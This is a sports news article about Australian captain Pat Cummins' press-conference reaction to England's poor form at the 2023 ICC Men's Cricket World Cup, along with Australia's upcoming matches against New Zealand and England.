Pat Cummins Reaction England Poor Form ICC Cricket World Cup 2023 Viral Video

[ad_1]

Australia’s captain, Pat Cummins’ reaction to arch-rival England’s struggles in the ICC Men’s Cricket World Cup 2023 has gone viral on social media. While acknowledging the sadness of the defending champions’ challenging campaign, Cummins couldn’t conceal his amusement after England’s fourth loss in five matches.

Australia managed to recover from a sluggish start in the ICC Men’s Cricket World Cup 2023 by securing three consecutive victories against Sri Lanka, Afghanistan, and the Netherlands. However, England have been unable to find their form, with this being said one of their worst World Cup performances in years. They currently occupy the 9th position out of 10 teams in the World Cup 2023 points table, and their chances of making it to the semi-finals appear bleak.

During the customary pre-match press conference ahead of Australia’s match against New Zealand, a journalist posed a rather tricky question to the Australian captain. He asked Cummins for his reaction to England’s significant loss to Sri Lanka, considering that Australia would face England in a couple of games.

“You mentioned close friends in other teams. I imagine you would have been heartbroken to see England suffer a defeat last night. What was your reaction to that given you have got them in a couple of games time?” the journalist asked.

“Yeah, obviously we’ve got them in a couple of games time – so we’ll have a close look there, but yeah, it’s sad to see. Don’t have much for you there.” responded Cummins while trying to hold his laugh or so it seemed.

Australia To Take On Arch-Rivals England on November 4 In Cricket World Cup 2023

Notably, Australia are scheduled to take on England on Saturday, November 4, following England’s match against India in Lucknow on Sunday. England’s upcoming path looks challenging as they will confront two former champions who are in good form.

Cummins and his team aim to carry their aggressive batting and bowling form from recent games into the clash with their old rivals, New Zealand, in Dharamsala. Cummins stated in the press conference, “Our group’s big on talking about the style that we want to play, and I think in the first two games not only did we not win, but I think we didn’t really nail the style that we wanted to play.”

The match between Australia and New Zealand is set to take place at 10:30 am IST at the HPCA Stadium in Dharamsala on Saturday, October 28.
